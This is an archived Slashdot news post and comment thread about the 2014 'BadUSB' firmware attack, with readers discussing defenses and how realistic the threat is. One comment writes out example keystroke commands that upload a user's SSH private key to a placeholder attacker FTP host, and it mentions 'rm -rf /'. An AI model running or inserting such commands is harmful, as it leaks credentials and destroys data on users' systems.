Forgot your password?
typodupeerror
Security Data Storage Input Devices

"BadUSB" Exploit Makes Devices Turn "Evil" 205

Posted by timothy
from the thinkgeek-had-something-funnier-years-ago dept.
An anonymous reader writes with a snippet from Ars Technica that should make you (even more) skeptical about plugging in random USB drives, or allowing persons unknown physical access to your computer's USB ports: When creators of the state-sponsored Stuxnet worm used a USB stick to infect air-gapped computers inside Iran's heavily fortified Natanz nuclear facility, trust in the ubiquitous storage medium suffered a devastating blow. Now, white-hat hackers have devised a feat even more seminal—an exploit that transforms keyboards, Web cams, and other types of USB-connected devices into highly programmable attack platforms that can't be detected by today's defenses. Dubbed BadUSB, the hack reprograms embedded firmware to give USB devices new, covert capabilities. In a demonstration scheduled at next week's Black Hat security conference in Las Vegas, a USB drive, for instance, will take on the ability to act as a keyboard that surreptitiously types malicious commands into attached computers. A different drive will similarly be reprogrammed to act as a network card that causes connected computers to connect to malicious sites impersonating Google, Facebook or other trusted destinations. The presenters will demonstrate similar hacks that work against Android phones when attached to targeted computers. They say their technique will work on Web cams, keyboards, and most other types of USB-enabled devices.
This discussion has been archived. No new comments can be posted.

"BadUSB" Exploit Makes Devices Turn "Evil"

Comments Filter:
  • by Anonymous Coward on Thursday July 31, 2014 @11:00AM (#47574385)

    Here comes the digitially signed / encrypted usb dongles for USB 4.x, where every device has a firmware signature encrypted within the device and part of the usb handshake will be to read the entire firmware to re-calc the signature to make sure it matches, with a 3rd comparison via the internet to a usb device registry.

    Then the criminals will figure out how to falsify the signature with the bad firmware anyway.

    • ...with a 3rd comparison via the internet to a usb device registry.

      That makes the whole concept dead on arrival. Anything that requires a connection is no damn good, aside from a remote terminal, I suppose

      • by Lumpy (12016)

        All you need to do is have the USB drive mounted by a locked down device. Example, RasPi set to read only on the OS and disable everything all it does is mounts the USB drive and then offers up the contents via the network.

        I dont care what you have in the USB stick it will not auto run and infect. then your can look at the contents with another pc via the network and see the real contents or even run automated tests on it before it is available to the users machine.

        It is not hard to make something that w

        • Re: (Score:2, Informative)

          by Anonymous Coward
          What they are talking about here infects on firmware/driver level initialization between USB device and computer when plugged in that is an inherent part of the USB standard, before and invisible to any user mode (software) inspection (and how do you plan to see/test that the usb firmware is not infected?). This is not your regular Windows auto-run type problem.
          • by Obfuscant (592200)

            What they are talking about here infects on firmware/driver level initialization between USB device and computer when plugged in that is an inherent part of the USB standard, before and invisible to any user mode (software) inspection (and how do you plan to see/test that the usb firmware is not infected?).

            Actually, this sounds like an interesting job for a Pi. I just checked the latest raspbian on my Pi and USB is compiled into the kernel (no USB modules, at least nothing obviously so). Recompile the kernel so USB is all loadable modules, then modify the base USB code to report transactions.

            Plug your USB stick or disk or keyboard into the Pi, and if it reports that there's a new not-a-USB-stick/disk/keyboard, you know there's malware on the device.

            On a different note, does anyone know of any modified fir

      • That makes the whole concept dead on arrival. Anything that requires a connection is no damn good, aside from a remote terminal, I suppose

        How else do you plan to distribute a CRL? The firmware can get programmed with the updated certificate store when you have access to the CRL, but it can operate fine offline without it (accepting the enhanced risk).

    • Re: (Score:3, Insightful)

      by Anonymous Coward

      Wouldn't it be much simpler to make USB device firmware not upgradeable? When have you ever updated the firmware on a mouse or keyboard? If there's a legitmate need to leave them upgradeable, put in a jumper or switch that is off by default.

      • by Richy_T (111409)

        Then the hacker simply swaps the hardware for updatable hardware.

        • At the point where a hacker has physical access to one of your machines, you have bigger problems than whether they're going to swap out your mouse for something more easily hackable.
    • by AmiMoJo (196126) *

      There are much worse threats. Thunderbolt and Firewire give the device full access to RAM, with no protection at all. For over a decade companies have been making Firewire and now Thunderbolt devices that dump a running PC's memory for forensic analysis, complete with any encryption keys and passwords that happen to be there. Law enforcement loves them because even if the computer is locked or the user logged out when they get there most operating systems auto-configure newly plugged in devices. Thunderbolt

  • I thought it was common sense not to plug in untrusted devices to your computer. Especially unknown thumb drives, unless you can use them in a read only device.

    • and of course I re-read this and realize they meant also changing a webcam or keyboard to be malicious. Man I shouldn't post before my morning coffee.

      • by NJRoadfan (1254248) on Thursday July 31, 2014 @11:36AM (#47574669)

        and of course I re-read this and realize they meant also changing a webcam or keyboard to be malicious. Man I shouldn't post before my morning coffee.

        Let them try reprogramming a Model M keyboard. There is one perk to legacy PS/2 ports, they are secure!

        • And if the hackers are inside your house, you simply attack them with the Model M as a weapon.

    • by blueg3 (192743) on Thursday July 31, 2014 @11:14AM (#47574479)

      The whole point of this is that the malware reprograms the firmware of existing, trusted devices to make them malicious.

      • Re: (Score:2, Informative)

        by Anonymous Coward

        As far as I can tell from the article it's not "malware reprograms", it's "malicious third party with physicall acess to USB device reprograms".

        Quite a bit of difference.

      • by janoc (699997) on Thursday July 31, 2014 @12:06PM (#47574883)

        I would love to see malware that will reprogram a mask-programmed blob in a common throwaway hardware. Or a microcontroller in a webcam that doesn't even have the programming pins (typically some sort of ISP or JTAG) connected to anything USB accessible (or not even connected at all, at best to some test pads).

        A typical USB stick or a webcam don't have hardware to permit firmware upgrades, even though the silicon inside could be theoretically upgradable. Not to mention that the exploit would have to be written specifically for the target hardware - different processors, memory layout, USB interface, etc - all that would make it really hard to produce a generic malware. If you want to see what is involved in something like that, look at the article on hacking HDD controllers:
        http://spritesmods.com/?art=hd... [spritesmods.com] And that is a harddrive, which are produced by only few manufacturers, have relatively standardized interfaces and controllers. Now imagine having to do that sort of reverse engineering on every type of harddrive in common use if you wanted to write a reasonably effective malware (e.g. a data stealing worm). It is much easier to exploit some Windows bug or use a phishing scam than this.

        So yes, this is potentially a threat, but panicking over your USB sticks or webcams going rogue on you is vastly overblown. This could be an issue for a very targeted attack where the benefits of compromising e.g. a keyboard of a high value target will outweigh the effort required, but not really anything else. And that assumes that the keyboard is actually able to be updated! It would be probably simpler to just send an operative in and install e.g. a keylogger ...

        Oh and they mention the "BadBios" story ... Nobody was ever able to confirm that apart from the original very confused researcher.

        • Okay, so, instead the blackhats break into the factory that is manufacturing the chips and modify the firmware that is being written to them. Now, every USB keyboard that the company manufactures looks to the computer as both a USB keyboard, and a USB network device.

          I'm sure you remember those instances where malware was being pre-installed onto pre-formatted external drives, right?

          Sure, there's a lot more to be done to turn that "Fake network device" into something that can trick the OS into treating it as

        • I bet at least 20% of the USB devices use the same FTDI chip for USB functionality, and another 20% use Atmel AVR microcontrollers. If your malware patched or replaced the Atmel firmware, you could own a lot if systems.

          It wouldn't even NEED to continue to work like the original device, so you could just replace the firmware with the Atmel firmware I wrote last night. The user plugs in their webcam or tries to turn it on. The webcam doesn't work anymore. The bad guy doesn't care, at that point he has alr

        • by melstav (174456)

          A typical USB stick or a webcam don't have hardware to permit firmware upgrades, even though the silicon inside could be theoretically upgradable.

          How uninformed you are!

          https://forums.hak5.org/index.php?/topic/8630-collection-of-production-tools-for-usb-devices/ is a discussion of "production tools" for USB flash drives.

          These tools are specific to the controller in the flashdrive (chipsbank, micov, etc) and allow you to do things like change what size the drive reports itself as, load files onto the thing

        • by melstav (174456)
          Hell, even the controllers in SD Cards can be exploited to run arbitrary code - http://bunniefoo.com/bunnie/sd... [bunniefoo.com]
      • So what you're saying is, the malware looks like Kristanna Loken?

    • by Canth7 (520476) * on Thursday July 31, 2014 @11:15AM (#47574489)

      I thought it was common sense not to plug in untrusted devices to your computer. Especially unknown thumb drives, unless you can use them in a read only device.

      The problem at hand is that you can take a trustworthy device, plug it into an infected computer and then your trustworthy device becomes compromised and not easily detectably so, infecting your formerly clean PC. So far, no comments on mitigating procedures or OS specific circumstances. Most OSes will automatically load USB devices so in theory this could affect just about every OS whereby a compromised phone decides to become a keyboard and starts typing keystrokes and sending data to a 3rd party. Scary, at least in theory.

    • My understanding of this.. read only only mitigates part of this.

      The simple part:

      So, you plug something in. It gets an enumerate request. It replies back "Howdy, i'm a USB mass storage device (a.k.a hard drive)".. Ok cool, i mount you read only. But then the stick says "Oh BTW, im also a keyboard". This is where you get hosed. Read only, disabled autoplay, doesn't help you as much as you want.

      The "keyboard" can then send keystrokes to your machine. There are probably some things you can do with this with

  • Leverage (Score:4, Informative)

    by PRMan (959735) on Thursday July 31, 2014 @11:03AM (#47574405)
    And everyone said that when Hardison would program USB sticks to type stuff and send all the data back to headquarters when they just plugged it in a computer that it was not real. It turns out he was just ahead of everyone else.
    • $hat = 'tinfoil'

      Nah, Leverage is just an illegally de-classified documentary of a black ops crime fighting unit from the future, sent back to us by the rebels as a warning about what's coming next.
  • From the article, it seems like this attack is done by hardware-modifying a USB stick so that the firmware can be changed. While I get that this is a major problem for organizations that have a bunch of computers that could potentially have one of these things inserted into them, for most people it doesn't seem like a problem. The most I can see happening with this is someone putting bad firmware onto a USB device and selling them on EBay or similar as a means of stealing people's data, but I think that wou

    • by gstoddart (321705) on Thursday July 31, 2014 @11:13AM (#47574475) Homepage

      The most I can see happening with this is someone putting bad firmware onto a USB device and selling them on EBay or similar as a means of stealing people's data, but I think that would be pretty easy to track

      Really? Because the worst I can imagine is the NSA or another spy agency getting a shipment of devices from the manufacturer so that when you get it delivered new and in the box it's already compromised. Your brand new shiny Dell or HP would be compromised from the factory.

      Think I've not got enough layers of tinfoil? Google for "Cisco NSA routers".

      At this point, if it can be exploited by these clowns, it will be.

      law enforcement will figure out the trick pretty quickly

      Unless, of course, it's law enforcement who have done it.

      • I'd be interested to see how well this works against linux workstations. Having the ability to arbitrarily send keyboard commands will only be effective if a) they're the correct key commands (eg, the shortcut to open the terminal client, or a web browser, which changes depending on your desktop environment) and you can actually *do* those commands. Eg, "rm -rf /" isn't going to work without the superuser password.

        That said...something like "cd ~/.ssh;ftp attack@myserver.hack;put id_rsa;exit" wouldn't nec
    • by Anubis IV (1279820) on Thursday July 31, 2014 @11:21AM (#47574553)

      I've heard about a few cases (which is a fancy way of saying, "I once heard a third-hand story, but am too lazy to fact check myself at the moment") of attackers leaving thumb drives in parking lots outside the buildings of offices they wanted to hack, as if the drives had been dropped out there by accident after slipping out of a pocket. Employees of the company inevitably found the drives, some of them kept the drives for personal use, and some of those drives eventually got plugged into computers inside the office. With AutoPlay settings and the like, it used to be fairly trivial for malware to enter an office that way.

      Which is to say, if you find a USB drive in your company's parking lot, toss it in the trash if you can't find the original owner.

      • by bware (148533)

        I have heard of this first hand. Plug in a USB device to see who to return it to, and not long after, security (computer and otherwise) pay you a visit to personally demonstrate the computer security policies you were supposed to learn from the online video training.

      • by drinkypoo (153816)

        Which is to say, if you find a USB drive in your company's parking lot, toss it in the trash if you can't find the original owner.

        Or I can connect it to a Linux VM and see what that has to say about it...

    • by blueg3 (192743) on Thursday July 31, 2014 @11:24AM (#47574581)

      1. A ton of USB devices are actually implemented as general-purpose components with programmable firmware (attached to whatever support hardware, like a network card or a webcam, is necessary). So they're more common than you think.

      2. Smartphones are an excellent reprogrammable USB device that lots of individuals have.

      3. This is difficult enough to really engineer well that it is probably a bigger threat as a targeted attack against a big organization for now. Until someone does the engineering to make it easy to deploy widely. Then, it'll be a threat for everyone. Kind of like automated hacking of consumer-grade routers to modify the firmware to participate in an Internet-wide portscan. It's the Metasploit effect: it's not a big problem until someone makes it automated, then it is.

      • by Anonymous Coward on Thursday July 31, 2014 @11:45AM (#47574745)

        Smartphones is the big problem. People think it is acceptable to just plug them in everywhere to "just charge them".

        I can go to a train-station or another reasonable public spot. Look for a power outlet and plug in my "charging station" that turn a smartphone into a malicious device.
        This will infect devices from a very diverse group that will travel around and connect their devices to whatever USB-port they can find.

  • Windows loves to install USB drivers for all sorts of things. A couple NSA letters later and MS is now sending NSA payloads. They do not even have to ever touch the hardware.

    Sure this is the case with any hardware and MS but you would assume a secure facility would lock it down. But USB now you have the sneaker net issues.

    • by blueg3 (192743)

      A couple NSA letters later and MS is now sending NSA payloads.

      Because they couldn't already do this with network-distributed software updates?

      • I'll repeat.

        Sure this is the case with any hardware and MS but you would assume a secure facility would lock it down. But USB now you have the sneaker net issues.

        • by blueg3 (192743)

          What sneakernet issue? Be more clear. USB devices do not contain installable software, except for the obvious and well-known case of a mass-storage device happening to contain files that can be intentionally or inadvertently executed by the end user after the MSD is connected.

          • http://www.usb.org/developers/... [usb.org] has been around for a decade and a half. I'm sitting in front of a USB mouse that gets firmware updates. I've flashed USB keys with new firmware. USB devices can and do contain nonvolatile firmware not just flash drives and not just what is general accessed by the OS.

  • by NotInHere (3654617) on Thursday July 31, 2014 @11:18AM (#47574527)

    just ask the user whether they want that second keyboard, network card, or mouse attached. And a malicious DNS server is also not the thing that doesn't let me sleep at night -- https was designed for that.

    • Re:Simple (Score:5, Funny)

      by stewsters (1406737) on Thursday July 31, 2014 @11:27AM (#47574615)
      "Click OK to connect mouse"

      It leave a bit of a chicken and egg problem for normal users of systems without a keyboard built in.
      • by robmv (855035)

        Input this code I show you on screen with this virtual keyboard, and the OS filter everu other input event from that device that is not targeted to that keyboard, validate the input and accept or reject the device, annoying I know, but not impossible to protect

        • by mythosaz (572040)

          It's still chicken and egg. Even if you have a touchscreen, that screen is an input device too, you know.

          • by Sanians (2738917)

            I think he meant "physical keyboard" when he said "virtual keyboard." In other words, if you don't already have an input device connected that you've approved, if the new device is a keyboard, the OS displays a code for you to type on that keyboard in order to verify that it is a real keyboard and not a phony device in a flash drive, and ignores other input from that device until the code is typed correctly. Similarly, for a mouse you could display some buttons on the screen and ask the user to click them

  • Old attack (Score:5, Insightful)

    by robmv (855035) on Thursday July 31, 2014 @11:20AM (#47574549)

    This kind of attack is not new, the new part are the examples of generic devices with hacked firmware to do that. This can be solved easily requesting user autorization before activating any USB device type, for example, before telling the system that there is a new USB network device, ask the user for confirmation. The trick is with input devices, where the new device could be replacing a broken one (keyboard or mouse), the confirmation can be done requesting the user to type a code displayed on screen or using the mouse to use a on screen keyboard in order to accept the input device for general usage. The other problem is with devices permanently attached, assume that any attached device at boot time is trusted, If someone replaced your USB device when you weren't present other more awful things couls have been done.

  • Yet another annoyance, necessary in this "modern" world...

    While not a real solution at all, it should be easy for any OS to at least offer pop-up an approval when you plug in a USB device. E.g. "Do you want to connect this keyboard"? That would be a red flag if you didn't think it was a keyboard and give you a chance to deny it.

    Maybe skip the warning for pure storage devices - but warn for anything else. It might be disconcerting to have a warning for "Connect this video camera" when you were plugging
    • by amorsen (7485)

      USB device drivers are not of sufficient quality to make that mitigation very viable. Just exploit the broken drivers instead; on most operating systems device drivers have the equivalent of root privileges.

    • by Minwee (522556)

      NOTICE: USB DEVICES CONNECTED
      The following devices have been connected to USB bus 5:
      Device 0, Device ID="0123:4567", Manufacturer="Harmless USB Devices, Inc", DeviceClass="Hub", DeviceProtocol="Full speed hub"
      Device 1, Device ID="0123:4567", Manufacturer="Harmless USB Devices, Inc", InterfaceClass="Mass Storage", InterfaceProtocol="Bulk Only"
      Device 2, Device ID="0000:0000", Manufacturer="What is this", InterfaceClass="Human Interface Device", InterfaceProtocol="Keyboard"
      Device 3, Device ID="0000:0000

  • by blueshift_1 (3692407) on Thursday July 31, 2014 @11:28AM (#47574619)
    Just another reason why you shouldn't stick foreign objects in your orifices...
  • Almost any hardware component can be tampered with.
  • by jrumney (197329) on Thursday July 31, 2014 @11:44AM (#47574733) Homepage
    OK, this makes a bit more sense than the MSM version I read half an hour ago. In that article, they made it sound like USB keyboards were spreading a virus by reprogramming the USB controller chips on motherboards, which sounded a bit too far fetched to me (maybe one brand could be vulnerable - but a widespread problem?). In the Ars story it sounds more like they are reprogramming the firmware in the USB device itself to act as a different device. Cute trick, possibly useful against a carefully chosen target, but the likelyhood of a widespread attack seems minimal. And auditing your devices would be quite easy - just keep an eye on what device types are showing up in /sys/bus/usb or device manager.
    • just keep an eye on what device types are showing up in /sys/bus/usb or device manager.

      I'll pass this on to my mother, thanks!

  • by kheldan (1460303)
    Time to dig those PS/2 keyboards and mice out of the back of the closet, I guess..
    • I always choose a motherboard with both ports. Can be very useful even if you start out with both peripherals as USB. e.g. when my USB mouse broke, I got the older PS/2 one from a drawer and it still works very fine. Likewise I broke a keyb from 2010 or 2011 and ultimately replaced it with one from 1996 (which has grease and a space bar that needs serviced but registers all keys)

      • by JazzLad (935151)
        Nah, you can always use a USB to PS/2 adapter - I found a supplier that sells them cheap!


        Preemptive whooosh for the humour-impaired
  • by swb (14022) on Thursday July 31, 2014 @11:46AM (#47574753)

    If you had the money/resources, you could create these things by the thousand and bulk-mail these to major companies. It would stand to reason that somebody would end up plugging them into their office computer, enabling a back door.

    You could go even further and create hacked 5 port switches or access points and ship them off to big company branch offices, where users may be more likely to ignore standards or be short on resources and use those kinds of things anyway. You could put a return label on it for the office supply company or even the HQ office so that users thought it was something they had gotten by accident.

    I'd bet in a lot of cases people would just say "sweet" and go ahead and use them in the office, giving you a back door. A switch or access point would have enough space inside that custom hardware could be inserted giving a lot better back door, like having your own computer on their network.

  • Mainly because it's the first asking for access(Windows), I just no everything out. One of the largest security holes around and it's still fully active.

    Give up complete computer security because I want music to play seconds before I could do it myself.

    • This is kind of a new version of auto-run, one implemented by all operating systems.

      The problem with auto-run is that a CD might tell the computer to do anything, not just what the user would like it to do.

      The same problem exists with keyboards. They'll likely just send the keystrokes you type to the computer, much like the vast majority of CDs will only tell your computer to run the game that they contain that you want to play. However, a few will do something else, and the computer will happily do whate

  • The most obvious route for disaster is a compromised cellphone charger, at least for my usage patterns. Since it'd take me about ten minutes to make a pez-candy-sized PCB with USB-micro-M and USB-micro-F connectors with only the power lines connected between them, I'm wondering if an android phone will charge when it's getting power, regardless of whether the USB is connected, or it won't charge until it's had a USB chat. I recall older devices being able to charge at lower-power (150mA?) but having to ne

    • by blueg3 (192743)

      You just need a resistor or two. Almost any USB-charged device will charge at 500 mA if it is connected to a dumb charger (no data lines), but in order to charge at a higher current (as many devices do), it needs to sense that it's connected to a charger that supports the higher current draw. So that it can be implemented without real USB-supporting electronics, that's just done with some simple electrical components. So you can make a charger that blocks the data lines but permits full-speed charging.

      If yo

      • Awesome, thank you. Because I'm that kind of person I'll probably bodge one up on the pcb plotter today, with some available pads for adding resistors later.

        • by blueg3 (192743)

          Sure. Depending on your device (iPhone works differently from the standard USB fast-charging spec), you should be able to easily look up what resistors need to go where. (As mentioned, non-iPhone devices use an informal standardized spec. A circuit diagram of something like a Samsung charger should show you.)

  • For example, my keyboard has exactly 256 Bytes of FLASH storage. And if you put malware in there (which it is too small for), it loses its keymap. So "most" is really "some, and in particular devices modified for this" here. In addition, this attack need to be customized for each specific device, which is expensive. And many devices are not even reprogrammable without circumventing MCU protection bits.

    This is mostly a non-issue with regular devices.

  • Possibly explains why the cesg guys got certain usn related chips destroyed on The Guardian kit that had held Snowdens files - perhaps they'd already done this and wanted the evidence removed

"Your mother was a hamster, and your father smelt of elderberrys!" -- Monty Python and the Holy Grail

Working...